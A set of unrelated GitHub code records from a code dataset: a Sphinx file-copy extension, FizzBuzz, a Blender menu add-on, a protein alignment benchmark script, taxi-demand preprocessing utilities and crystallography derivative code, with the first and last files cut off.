Launch.\n#----------------------------------------------------------------------------#\n# Default port:\nif __name__ == '__main__':\n app.run()\n#db.create_all(), included initially to create the classes Venue and Artist, after that used migration to make changes accordingly\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"Blein7/Fyyur-udacity-project-Nano-degree","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33881318037","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Include In Output Sphinx Extension\n\nThis extension allows you to include relatively referenced files in the output\ndirectory.\n\nUsage with MyST:\n\n```markdown\n{include-in-output}`v1-maiden-6-9-21.bin`\n\nDear readers, please download the [provided binary file](v1-maiden-6-9-21.bin).\n```\n\nIncluding in jupyter-book:\n```python\n# _config.yml\n\n...\n\nsphinx:\n extra_extensions:\n - include_in_output\n...\n\n```\n\"\"\"\n\nfrom pathlib import Path\nimport shutil\nfrom docutils.nodes import reference\n\n\ndef resolve_asset_path(asset_path: Path, source_path: Path, src_dir: Path, out_dir: Path):\n if not asset_path.is_absolute():\n asset_path = source_path.parent / asset_path\n asset_path_relative = asset_path.relative_to(src_dir)\n else:\n asset_path_relative = str(asset_path).removeprefix('/')\n asset_path_src = src_dir / asset_path_relative\n asset_path_out = out_dir / asset_path_relative\n return (asset_path_src, asset_path_out)\n\n\ndef include_in_output_role(name, rawtext, text, lineno, inliner, options={}, content=[]):\n app = inliner.document.settings.env.app\n asset_path_src, asset_path_out = resolve_asset_path(\n Path(text), Path(inliner.document.attributes[\"source\"]),\n Path(app.srcdir), Path(app.outdir)\n )\n \n print(f\"Copying {asset_path_src} to {asset_path_out}\")\n print(f\"Creating {asset_path_out.parent}\")\n asset_path_out.parent.mkdir(parents=True, exist_ok=True)\n shutil.copy(asset_path_src, asset_path_out)\n inliner.reporter.info(f\"Included {asset_path_src} in output\")\n return [], []\n\n\ndef missing_reference_handler(app, env, node, contnode):\n _asset_path_src, asset_path_out = resolve_asset_path(\n Path(node[\"reftarget\"]), Path(contnode.source),\n Path(app.srcdir), Path(app.outdir)\n )\n \n if not asset_path_out.exists():\n return None\n\n return reference(node.rawsource, \"\", contnode, internal=True, refuri=node[\"reftarget\"])\n\n\ndef setup(app):\n app.connect(\"missing-reference\", missing_reference_handler)\n app.add_role(\"include-in-output\", include_in_output_role)\n","repo_name":"ubipo/pathy","sub_path":"pathy_docutils/include_in_output.py","file_name":"include_in_output.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27584571350","text":"# Fizzbuzz in Python.\n#\n# This is the straightforward, traditional version with nested\n# if-statements.\n#\n\nclass FizzBuzz():\n \"\"\"Class doing FizzBuzz.\"\"\"\n\n def do_fizzbuzz(self, m):\n \"\"\"Return m, fizz, buzz or fizzbuzz as appropriate.\"\"\"\n if (m % 15) == 0:\n return 'fizzbuzz'\n elif (m % 3) == 0:\n return 'fizz'\n elif (m % 5) == 0:\n return 'buzz'\n else:\n return '%i' % m\n\n def print_table(self, n):\n \"\"\"Print the FizzBuzz table up to n.\"\"\"\n for i in range(1, n+1):\n print (self.do_fizzbuzz(i))\n\n# Main program section.\nfb = FizzBuzz()\nfb.print_table(100)\n","repo_name":"OmriMeshulam/FizzBuzz-Challenge","sub_path":"Python/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28449616131","text":"import heapq\n\ndef solution(stock, dates, supplies, k):\n ans = 0\n hq = []\n idx = 0\n while stock < k:\n for i in range(idx, len(dates)):\n if stock < dates[i]:\n break\n heapq.heappush(hq, -supplies[i])\n idx += 1\n stock += heapq.heappop(hq)*-1\n ans+=1\n return ans\n","repo_name":"imsoncod/Python-Algorithm","sub_path":"Programmers/라면공장.py","file_name":"라면공장.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14323845128","text":"###########################################################\r\n#\r\n# This addon made by Shihab.\r\n#\r\n# This addon completly free.\r\n# \r\n###########################################################\r\nbl_info = {\r\n \"name\" : \"Add Menu\", \r\n \"category\" : \"Game Engine\", \r\n \"author\" : \"Shihab\", \r\n \"blender\" : (2,79,0), \r\n \"location\" : \"View3D > UI toolbar (n)\", \r\n \"description\": \"Adds Menu\", \"version\":(2,2), \r\n \"wiki_url\" : \"https://blenderartists.org/t/addon-add-menu/1255135\",\r\n \"tracker_url\" : \"https://blenderartists.org/t/addon-add-menu/1255135\"\r\n}\r\n\r\nimport bpy\r\nimport math\r\nimport mathutils\r\n\r\ndef AddMenu():\r\n scene = bpy.context.scene\r\n \r\n #camera menu\r\n bpy.ops.object.camera_add()\r\n caM = bpy.context.object\r\n caM.name = 'cameraMenu'\r\n caM.location = ((3, 4, 13))\r\n caM.rotation_euler = (0, 0, 7.84)\r\n caM.data.lens = (20)\r\n bpy.context.scene.camera = caM\r\n \r\n #add play and settings\r\n bpy.ops.mesh.primitive_plane_add()\r\n play = bpy.context.object\r\n play.name = 'playButton'\r\n play.game.physics_type = 'STATIC'\r\n play.scale = ((1.2, 3.2, 1))\r\n play.location = ((0, 4, 0.3))\r\n mat = bpy.data.materials.new(name=\"MAT\")\r\n mat.diffuse_color = (0.288, 0.5, 0.1)\r\n bpy.ops.object.material_slot_add()\r\n play.data.materials[0] = mat\r\n mat.use_shadeless = True\r\n\r\n #text play\r\n bpy.ops.object.text_add()\r\n Text = bpy.context.object\r\n Text.name = 'textPlay'\r\n Text.game.physics_type = 'NO_COLLISION'\r\n Text.scale = ((2, 2, 1))\r\n Text.location = ((0.6, 1.5, 0.4))\r\n Text.rotation_euler = (0, 0, 7.84)\r\n Text.data.body = 'PLAY'\r\n \r\n #add developer and settings\r\n bpy.ops.mesh.primitive_plane_add()\r\n developer = bpy.context.object\r\n developer.name = 'developerButton'\r\n developer.game.physics_type = 'STATIC'\r\n developer.scale = ((1.2, 6.2, 1))\r\n developer.location = ((3, 4, 0.3))\r\n bpy.ops.object.material_slot_add()\r\n developer.data.materials[0] = mat\r\n \r\n #text develpoer\r\n bpy.ops.object.text_add()\r\n Text3 = bpy.context.object\r\n Text3.name = 'textDeveloper'\r\n Text3.game.physics_type = 'NO_COLLISION'\r\n Text3.scale = ((2, 2, 1))\r\n Text3.location = ((3.6, -1.9, 0.4))\r\n Text3.rotation_euler = (0, 0, 7.84)\r\n Text3.data.body = 'DEVELOPER'\r\n print('GG')\r\n \r\n #add quit and settings\r\n bpy.ops.mesh.primitive_plane_add()\r\n Quit = bpy.context.object\r\n Quit.name = 'quitButton'\r\n Quit.game.physics_type = 'STATIC'\r\n Quit.scale = ((1.2, 3.2, 1))\r\n Quit.location = ((6, 4, 0.3))\r\n bpy.ops.object.material_slot_add()\r\n Quit.data.materials[0] = mat\r\n\r\n #text quit\r\n bpy.ops.object.text_add()\r\n Text2 = bpy.context.object\r\n Text2.name = 'textQuit'\r\n Text2.game.physics_type = 'NO_COLLISION'\r\n Text2.scale = ((2, 2, 1))\r\n Text2.location = ((6.6, 1.5, 0.4))\r\n Text2.rotation_euler = (0, 0, 7.84)\r\n Text2.data.body = 'QUIT'\r\n \r\n #camera menu\r\n bpy.ops.object.camera_add()\r\n caM2 = bpy.context.object\r\n caM2.name = 'cameraDeveloper'\r\n caM2.location = ((3, 28, 13))\r\n caM2.rotation_euler = (0, 0, 7.84)\r\n caM2.data.lens = (20)\r\n \r\n #plane developer\r\n bpy.ops.mesh.primitive_plane_add()\r\n imgv = bpy.context.object\r\n imgv.name = 'developerImage'\r\n imgv.game.physics_type = \"NO_COLLISION\"\r\n imgv.scale = ((6.3, 10.6, 0))\r\n imgv.location = ((3, 28, 0))\r\n imgv.rotation_euler = (0, 0, 0)\r\n mat2 = bpy.data.materials.new(name=\"MAT Developer\")\r\n bpy.ops.object.material_slot_add()\r\n imgv.data.materials[0] = mat2\r\n mat2.use_shadeless = True\r\n cTx = bpy.data.textures.new(\"Texture Developer INFO\", type = 'IMAGE')\r\n mtx = mat2.texture_slots.add()\r\n mtx.texture = cTx\r\n \r\n #back plane\r\n bpy.ops.mesh.primitive_plane_add()\r\n bak = bpy.context.object\r\n bak.name = \"backButton\"\r\n bak.game.physics_type = \"STATIC\"\r\n bak.scale = ((1.2, 3.2, 1))\r\n bak.location = ((7.5, 21.5, 0.2))\r\n bak.rotation_euler = (0, 0, 0)\r\n mat3 = bpy.data.materials.new(name=\"MAT Back Button\")\r\n mat3.diffuse_color = (0.288, 0.5, 0.1)\r\n bpy.ops.object.material_slot_add()\r\n bak.data.materials[0] = mat3\r\n mat3.use_shadeless = True\r\n \r\n #back text\r\n bpy.ops.object.text_add()\r\n Text4 = bpy.context.object\r\n Text4.name = 'textBack'\r\n Text4.game.physics_type = 'NO_COLLISION'\r\n Text4.scale = ((2, 2, 1))\r\n Text4.location = ((8.1, 18.6, 0.3))\r\n Text4.rotation_euler = (0, 0, 7.84)\r\n Text4.data.body = 'BACK'\r\n \r\n #logic editor for play\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='left',object=play.name)\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=play.name)\r\n bpy.ops.logic.actuator_add(type=\"SCENE\",name='playScene',object=play.name)\r\n play.game.actuators['playScene'].mode = 'SET'\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=play.name)\r\n play.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n bpy.ops.logic.sensor_add(type=\"ALWAYS\",name='Always',object=play.name)\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=play.name)\r\n bpy.ops.logic.actuator_add(type=\"MOUSE\",name='Mouse Show',object=play.name)\r\n play.game.sensors['Always'].use_tap = True\r\n play.game.sensors['left'].use_tap = True\r\n\r\n #logic editor for quit\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='left',object=Quit.name)\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=Quit.name)\r\n bpy.ops.logic.actuator_add(type=\"GAME\",name='Quit Game',object=Quit.name)\r\n Quit.game.actuators['Quit Game'].mode = 'QUIT'\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=Quit.name)\r\n Quit.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n Quit.game.sensors['left'].use_tap = True\r\n \r\n #logic editor for developer\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='left',object=developer.name)\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=developer.name)\r\n developer.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n developer.game.sensors['left'].use_tap = True\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=developer.name)\r\n bpy.ops.logic.actuator_add(type=\"SCENE\",name='Go_Camera',object=developer.name)\r\n developer.game.actuators['Go_Camera'].mode = 'CAMERA'\r\n developer.game.actuators['Go_Camera'].camera = bpy.data.objects[\"Camera_developer\"]\r\n \r\n #logic editor for back_button\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='Left',object=bak.name)\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=bak.name)\r\n bak.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n bak.game.sensors['Left'].use_tap = True\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=bak.name)\r\n bpy.ops.logic.actuator_add(type=\"SCENE\",name='Select Camera Menu',object=bak.name)\r\n bak.game.actuators['Select Camera Menu'].mode = 'CAMERA'\r\n bak.game.actuators['Select Camera Menu'].camera = bpy.data.objects[\"Camera_Menu\"]\r\n \r\n #link controlles play\r\n play.game.sensors['left'].link(play.game.controllers[-1])\r\n play.game.actuators[\"playScene\"].link(play.game.controllers[-1])\r\n play.game.sensors['over'].link(play.game.controllers[-1])\r\n play.game.actuators[\"Mouse Show\"].link(play.game.controllers[0])\r\n play.game.sensors['Always'].link(play.game.controllers[0])\r\n #link controllers Quit\r\n Quit.game.sensors['left'].link(Quit.game.controllers[-1])\r\n Quit.game.actuators[\"Quit Game\"].link(Quit.game.controllers[-1])\r\n Quit.game.sensors['over'].link(Quit.game.controllers[-1])\r\n #link conrollers developer\r\n developer.game.sensors['left'].link(developer.game.controllers[-1])\r\n developer.game.sensors['over'].link(developer.game.controllers[-1])\r\n developer.game.actuators[\"Go_Camera\"].link(developer.game.controllers[-1])\r\n #link controllers bak_button\r\n bak.game.sensors['Left'].link(bak.game.controllers[-1])\r\n bak.game.sensors['over'].link(bak.game.controllers[-1])\r\n bak.game.actuators[\"Select Camera Menu\"].link(bak.game.controllers[-1])\r\n \r\nclass add_menu(bpy.types.Operator):\r\n bl_idname = \"object.add_menu\"\r\n bl_description = 'add a menu (set the scene to play it from menu)'\r\n bl_label = \"Add Menu\"\r\n bl_options = {\"REGISTER\",\"UNDO\"}\r\n \r\n def execute(self, context):\r\n AddMenu()\r\n self.report({'INFO'}, \"Menu added\")\r\n return {\"FINISHED\"}\r\n \r\nclass panel(bpy.types.Panel):\r\n bl_label = \"Menu\"\r\n bl_space_type = \"VIEW_3D\"\r\n bl_region_type = 'UI'\r\n \r\n def draw(self,context):\r\n layout = self.layout\r\n scene = context.scene\r\n \r\n row = layout.row()\r\n row.scale_y = 1.6\r\n row.operator(\"object.add_menu\",text='Add Menu')\r\n \r\ndef register():\r\n bpy.utils.register_class(panel)\r\n bpy.utils.register_class(add_menu)\r\n\r\ndef unregister():\r\n bpy.utils.unregister_class(panel)\r\n bpy.utils.unregister_class(add_menu)\r\n \r\nif __name__ == \"__main__\":\r\n register()\r\n","repo_name":"Shihab3/addMenuAddon","sub_path":"menuAddon.py","file_name":"menuAddon.py","file_ext":"py","file_size_in_byte":9038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70117883370","text":"from copy import deepcopy\nimport subprocess\nfrom sys import argv\nimport random\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport time\n\nNprots=1000\nmats=[\"randblos.mat\",\"blosum62.mat\",\"new99.mat\"]\n\nf=open(\"astral-scopedom-seqres-gd-sel-gs-bib-40-2.06.fa\")\nprots=[]\nseq=\"\"\ncurrprot=[\"\",\"\"]\n\nfor line in f:\n if line[0]==\">\":\n if seq==\"\":\n scopid=line.split()[1]\n parts=scopid.split(\".\")\n currprot[0]=\".\".join(parts[:3])\n else:\n currprot[1]=seq\n prots.append(deepcopy(currprot))\n seq=\"\"\n scopid=line.split()[1]\n parts=scopid.split(\".\")\n currprot[0]=\".\".join(parts[:3])\n else:\n seq+=line.strip().upper()\n\ncurrprot[1]=seq\nprots.append(currprot)\n\n#Nprots=len(prots)\ncurrmat=\"Default\"\n\ndef align(i):\n conttab=[[0,0],[0,0]]\n for j in range(i):\n if i!=j:\n if len(prots[i][1])>len(prots[j][1]):\n seq1=prots[i][1]\n seq2=prots[j][1]\n else:\n seq1=prots[j][1]\n seq2=prots[i][1]\n seq1=prots[i][1]\n seq2=prots[j][1]\n process=subprocess.Popen([\"./align\",\"-p\",seq1,\"-q\",seq2,\"-m\",currmat,\"-Q\"],stdout=subprocess.PIPE)\n seqid,err=process.communicate()\n seqid=float(seqid)\n if seqid>0.25:\n if prots[i][0]==prots[j][0]:\n conttab[0][0]+=1\n else:\n conttab[0][1]+=1\n else:\n if prots[i][0]==prots[j][0]:\n conttab[1][0]+=1\n else:\n conttab[1][1]+=1\n return conttab\n\nif len(argv) > 1:\n random.seed(argv[1])\nrandom.shuffle(prots)\n\nfor mat in mats:\n print (time.strftime(\"%m/%d/%Y %H:%M:%S\"))\n currmat=mat\n pool=ThreadPool(8)\n eyes=[i for i in range(Nprots)]\n res=pool.map(align,eyes)\n pool.close()\n pool.join()\n conttab=[[0,0],[0,0]]\n for i in res:\n conttab[0][0]+=i[0][0]\n conttab[0][1]+=i[0][1]\n conttab[1][0]+=i[1][0]\n conttab[1][1]+=i[1][1]\n print(conttab)\n sumall=float(sum([conttab[0][0],conttab[0][1],conttab[1][0],conttab[1][1]]))\n print(sum([conttab[0][0],conttab[1][1]])/sumall)\n print(float(conttab[0][0])/sum([conttab[0][0],conttab[0][1]]))\n print(float(conttab[0][0])/sum([conttab[0][0],conttab[1][0]]))\n \nprint (time.strftime(\"%m/%d/%Y %H:%M:%S\"))\n","repo_name":"ewbell94/bioinf527proj","sub_path":"homologsearch.py","file_name":"homologsearch.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2259507232","text":"import dask.dataframe as dd\r\nimport math\r\nimport datetime\r\nimport time\r\nimport numpy as np\r\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\r\n\r\ndef data_loading(months, path, initial_frames):\r\n for month in months:\r\n initial_frames[f'{month}'] = dd.read_csv(path + \"\\\\\" + f'yellow_tripdata_{month}.csv')\r\n\r\ndef convert_to_unix(s):\r\n return time.mktime(datetime.datetime.strptime(s, \"%Y-%m-%d %H:%M:%S\").timetuple())\r\n\r\n# Return a DataFrame with additional trip time-related columns\r\ndef return_with_trip_times(frame):\r\n duration = frame[['tpep_pickup_datetime','tpep_dropoff_datetime']].compute()\r\n #pickups and dropoffs to unix time\r\n duration_pickup = [convert_to_unix(x) for x in duration['tpep_pickup_datetime'].values]\r\n duration_drop = [convert_to_unix(x) for x in duration['tpep_dropoff_datetime'].values]\r\n #calculate duration of trips\r\n durations = (np.array(duration_drop) - np.array(duration_pickup))/float(60)\r\n\r\n #append durations of trips and speed in miles/hr to a new dataframe\r\n new_frame = frame[['passenger_count','trip_distance','pickup_longitude','pickup_latitude','dropoff_longitude','dropoff_latitude','total_amount']].compute()\r\n \r\n new_frame['trip_times'] = durations\r\n new_frame['pickup_times'] = duration_pickup\r\n new_frame['Speed'] = 60*(new_frame['trip_distance']/new_frame['trip_times'])\r\n \r\n return new_frame\r\n\r\n\r\n#return a dataframe with outliers removed\r\ndef remove_outliers(new_frame):\r\n speed_limit = 45.31\r\n # Applying all filters\r\n new_frame = new_frame[\r\n ((new_frame.dropoff_longitude.between(-74.15, -73.7004)) &\r\n (new_frame.dropoff_latitude.between(40.5774, 40.9176))) &\r\n ((new_frame.pickup_longitude.between(-74.15, -73.7004)) &\r\n (new_frame.pickup_latitude.between(40.5774, 40.9176)))\r\n ]\r\n new_frame = new_frame[(new_frame.trip_times > 0) & (new_frame.trip_times < 720)]\r\n new_frame = new_frame[(new_frame.trip_distance > 0) & (new_frame.trip_distance < 23)]\r\n new_frame = new_frame[(new_frame.Speed < speed_limit) & (new_frame.Speed > 0)]\r\n new_frame = new_frame[(new_frame.total_amount < 1000) & (new_frame.total_amount > 0)]\r\n\r\n return new_frame\r\n\r\n# Constants for Unix times\r\nUNIX_TIMES_2015 = [1420070400, 1422748800, 1425168000, 1427846400, 1430438400, 1433116800]\r\nUNIX_TIMES_2016 = [1451606400, 1454284800, 1456790400, 1459468800, 1462060800, 1464739200]\r\n\r\ndef convert_to_est(unix_time, start_unix_time):\r\n # Convert Unix time to EST\r\n return int((unix_time - start_unix_time) / 600) + 33\r\n\r\ndef add_pickup_bins(frame, month, year):\r\n unix_pickup_times = frame['pickup_times'].values\r\n unix_times = [UNIX_TIMES_2015, UNIX_TIMES_2016]\r\n \r\n start_pickup_unix = unix_times[year - 2015][month - 1]\r\n \r\n # Convert pickup times to 10-minute bins in EST\r\n ten_minute_bins = [convert_to_est(unix_time, start_pickup_unix) for unix_time in unix_pickup_times]\r\n \r\n frame['pickup_bins'] = np.array(ten_minute_bins)\r\n \r\n return frame\r\n\r\n\r\n# Data Preparation for the months of Jan,Feb and March 2016\r\ndef frame_preparation(months, initial_frames, kmeans, prepared_frames, groupby_frames):\r\n for month in months:\r\n if 'jan' in month:\r\n mnth = 1\r\n elif 'feb' in month:\r\n mnth = 2\r\n else:\r\n mnth = 3\r\n if '2015' in month:\r\n year = 2015\r\n else:\r\n year = 2016\r\n prepared_frames[f'{month}'], groupby_frames[f'{month}'] = datapreparation(initial_frames[f'{month}'],kmeans,mnth,year)\r\n \r\ndef datapreparation(frame,kmeans,month_no,year_no):\r\n \r\n print (\"Return with trip times..\")\r\n\r\n frame_with_durations = return_with_trip_times(frame)\r\n \r\n print (\"Remove outliers..\")\r\n frame_with_durations_outliers_removed = remove_outliers(frame_with_durations)\r\n\r\n \r\n print (\"Estimating clusters..\")\r\n frame_with_durations_outliers_removed['pickup_cluster'] = kmeans.predict(frame_with_durations_outliers_removed[['pickup_latitude', 'pickup_longitude']])\r\n #frame_with_durations_outliers_removed_2016['pickup_cluster'] = kmeans.predict(frame_with_durations_outliers_removed_2016[['pickup_latitude', 'pickup_longitude']])\r\n\r\n print (\"Final groupbying..\")\r\n final_updated_frame = add_pickup_bins(frame_with_durations_outliers_removed,month_no,year_no)\r\n final_groupby_frame = final_updated_frame[['pickup_cluster','pickup_bins','trip_distance']].groupby(['pickup_cluster','pickup_bins']).count()\r\n \r\n return final_updated_frame,final_groupby_frame\r\n\r\n###########################################\r\ndef unique_pickup_bins(months):\r\n for month in months:\r\n globals()[f'{month}_unique'] = return_unq_pickup_bins(globals()[f'{month}_frame'])\r\n\r\n# Gets the unique bins where pickup values are present for each each reigion\r\ndef return_unq_pickup_bins(frame):\r\n values = []\r\n for i in range(0,40):\r\n new = frame[frame['pickup_cluster'] == i]\r\n list_unq = list(set(new['pickup_bins']))\r\n list_unq.sort()\r\n values.append(list_unq)\r\n return values\r\n\r\n#####################################################################################\r\ndef fill_missing(count_values,values):\r\n smoothed_regions=[]\r\n ind=0\r\n for r in range(0,40):\r\n smoothed_bins=[]\r\n for i in range(4464):\r\n if i in values[r]:\r\n smoothed_bins.append(count_values[ind])\r\n ind+=1\r\n else:\r\n smoothed_bins.append(0)\r\n smoothed_regions.extend(smoothed_bins)\r\n return smoothed_regions\r\n\r\n\r\ndef smoothing(count_values,values):\r\n smoothed_regions=[] # stores list of final smoothed values of each reigion\r\n ind=0\r\n repeat=0 \r\n smoothed_value=0\r\n for r in range(0,40):\r\n smoothed_bins=[] #stores the final smoothed values\r\n repeat=0\r\n for i in range(4464):\r\n if repeat!=0: # prevents iteration for a value which is already visited/resolved\r\n repeat-=1\r\n continue\r\n if i in values[r]: #checks if the pickup-bin exists \r\n smoothed_bins.append(count_values[ind]) # appends the value of the pickup bin if it exists\r\n else:\r\n if i!=0:\r\n right_hand_limit=0\r\n for j in range(i,4464):\r\n if j not in values[r]: #searches for the left-limit or the pickup-bin value which has a pickup value\r\n continue\r\n else:\r\n right_hand_limit=j\r\n break\r\n if right_hand_limit==0:\r\n #Case 1: When we have the last/last few values are found to be missing,hence we have no right-limit here\r\n smoothed_value=count_values[ind-1]*1.0/((4463-i)+2)*1.0 \r\n for j in range(i,4464): \r\n smoothed_bins.append(math.ceil(smoothed_value))\r\n smoothed_bins[i-1] = math.ceil(smoothed_value)\r\n repeat=(4463-i)\r\n ind-=1\r\n else:\r\n #Case 2: When we have the missing values between two known values\r\n smoothed_value=(count_values[ind-1]+count_values[ind])*1.0/((right_hand_limit-i)+2)*1.0 \r\n for j in range(i,right_hand_limit+1):\r\n smoothed_bins.append(math.ceil(smoothed_value))\r\n smoothed_bins[i-1] = math.ceil(smoothed_value)\r\n repeat=(right_hand_limit-i)\r\n else:\r\n #Case 3: When we have the first/first few values are found to be missing,hence we have no left-limit here\r\n right_hand_limit=0\r\n for j in range(i,4464):\r\n if j not in values[r]:\r\n continue\r\n else:\r\n right_hand_limit=j\r\n break\r\n smoothed_value=count_values[ind]*1.0/((right_hand_limit-i)+1)*1.0\r\n for j in range(i,right_hand_limit+1):\r\n smoothed_bins.append(math.ceil(smoothed_value))\r\n repeat=(right_hand_limit-i)\r\n ind+=1\r\n smoothed_regions.extend(smoothed_bins)\r\n return smoothed_regions\r\n\r\n###############################################################################################\r\n\r\ndef initialize_kmeans(frame):\r\n print(\"initializing kmeans\")\r\n frame = return_with_trip_times(frame)\r\n frame = remove_outliers(frame)\r\n coords = frame[['pickup_latitude', 'pickup_longitude']].values\r\n kmeans = MiniBatchKMeans(n_clusters=40, batch_size=10000,random_state=0).fit(coords)\r\n return kmeans\r\n###################################\r\n\r\ndef split_data(tsne_feature):\r\n total_timestamps = 13099\r\n train_size = int(total_timestamps * 0.7)\r\n test_size = int(total_timestamps * 0.3)\r\n\r\n print(\"Size of train data:\", train_size)\r\n print(\"Size of test data:\", test_size)\r\n\r\n # Extracting first 70% of timestamp values for training data\r\n train_features = [tsne_feature[i * total_timestamps : (total_timestamps*i + train_size)] for i in range(40)]\r\n\r\n # Extracting remaining 30% of timestamp values for testing data\r\n test_features = [tsne_feature[i * total_timestamps + train_size : (i + 1) * total_timestamps] for i in range(40)]\r\n return train_features, test_features\r\n#########################################\r\n\r\ndef frame_smoothing(months, smoothed_frames):\r\n for month in months:\r\n if month == 'jan_2015':\r\n globals()[f'{month}_fill'] = fill_missing(globals()[f'{month}_groupby']['trip_distance'].values.compute(), globals()[f'{month}_unique'])\r\n smoothed_frames[f'{month}'] = smoothing(globals()[f'{month}_groupby']['trip_distance'].values.compute(), globals()[f'{month}_unique'])\r\n else:\r\n smoothed_frames[f'{month}'] = fill_missing(globals()[f'{month}_groupby']['trip_distance'].values.compute(), globals()[f'{month}_unique'])\r\n","repo_name":"tarangchaturvedi/taxi_demand_prediction","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":10273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2521954398","text":"\nimport ImageD11.transform\nimport numpy as np\n\ndetpnames = [ 'distance', \n 'y_center', 'z_center',\n 'tilt_x', 'tilt_y', 'tilt_z',\n 'y_size', 'z_size', \n 'o11','o12','o21','o22'\n ]\ndetpsteps = {\n 'distance' : lambda distance: 0.001 * distance,\n 'y_center' : lambda centre: 0.01,\n 'z_center' : lambda centre: 0.01,\n 'tilt_x' : lambda tilt: 0.01*np.pi/180.0,\n 'tilt_y' : lambda tilt: 0.01*np.pi/180.0,\n 'tilt_z' : lambda tilt: 0.01*np.pi/180.0,\n 'y_size' : lambda size: 1.001*size,\n 'z_size' : lambda size: 1.001*size \n }\n\ndef computeXLYLZL( colfile, pars):\n pks = [ colfile.sc, colfile.fc ]\n dargs = {}\n for p in detpnames:\n dargs[p] = pars.get(p)\n xlylzl = ImageD11.transform.compute_xyz_lab( pks, **dargs )\n return xlylzl\n\ndef derivativeXLYLZL( colfile, pars, refinables ):\n pks = [ colfile.sc, colfile.fc ]\n dargs = {}\n for p in detpnames:\n dargs[p] = pars.get(p)\n calc = computeXLYLZL( colfile, pars )\n # parameter step sizes\n derivs = {}\n for p in refinables:\n step = detpsteps[p](dargs[p])\n psave = dargs[p]\n dargs[p] += step\n xlylzl1 = ImageD11.transform.compute_xyz_lab( pks, **dargs )\n derivs[p] = (xlylzl1 - calc) / step\n dargs[p] = psave\n return calc, derivs\n\n\noripnames = [ 'wedge', 'chi' ] \noripsteps = {'wedge' : lambda wedge : 0.1,\n 'chi' : lambda chi : 0.1,\n 't_x' : lambda t : 0.1, \n 't_y' : lambda t : 0.1, \n 't_z' : lambda t : 0.1, \n }\n\ndef grainorigins( colfile, agrain, pars ):\n omega = colfile.omega\n dargs = { 'wedge' : pars.get('wedge'),\n 'chi' : pars.get('chi') }\n dargs['t_x'], dargs['t_y'], dargs['t_z'] = \\\n agrain.translation\n origins = ImageD11.transform.compute_grain_origins( \n omega, **dargs )\n return origins\n\ndef derivativeorigins(colfile, agrain, pars, refinables):\n origins0 = grainorigins( colfile, agrain, pars )\n omega = colfile.omega\n t_x, t_y, t_z = agrain.translation\n wedge = pars.get('wedge')\n chi = pars.get('chi')\n derivs = {}\n dargs = { 'wedge' : pars.get('wedge'),\n 'chi' : pars.get('chi') }\n dargs['t_x'], dargs['t_y'], dargs['t_z'] = \\\n agrain.translation\n for p in refinables:\n step = oripsteps[p](dargs[p])\n psave = dargs[p]\n dargs[p] += step\n origins1 = ImageD11.transform.compute_grain_origins( omega, \n **dargs )\n derivs[p] = (origins1 - origins0) / step\n dargs[p] = psave\n return origins0, derivs\n\ndef labvec( colfile, agrain, pars):\n v_xlylzl = computeXLYLZL( colfile, pars )\n v_xgygzg = grainorigins( colfile, agrain, pars )\n v_labvec = v_xlylzl - v_xgygzg\n return v_labvec\n\ndef derivativelabvec( colfile, agrain, pars, refinables):\n dxlp = filter( lambda p: p in detpsteps, refinables )\n xlylzl, Dxlylzl = derivativeXLYLZL( colfile, pars, dxlp )\n dxgp = filter( lambda p: p in oripsteps, refinables )\n xgygzg, Dxgygzg = derivativeorigins( colfile, agrain, pars, dxgp)\n labvec = xlylzl - xgygzg\n Dlabvec = {}\n for p in dxlp:\n Dlabvec[p] = Dxlylzl[p]\n for p in dxgp:\n if Dlabvec.has_key(p): # not normally, but for forms sake\n Dlabvec[p] -= Dxgygzg[p]\n else:\n Dlabvec[p] = -Dxgygzg[p]\n return labvec, Dlabvec\n\ndef DgDk( colfile, pars):\n omega = colfile.omega\n # this would applies a rotation matrix which depends on omega, wedge, chi\n wedge = pars.get('wedge')\n chi = pars.get('chi')\n dummy = np.zeros( (3, len(omega) ) )\n dummy[0,:]=1\n dgdk0 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi )\n dummy[0,:]=0\n dummy[1,:]=1\n dgdk1 = 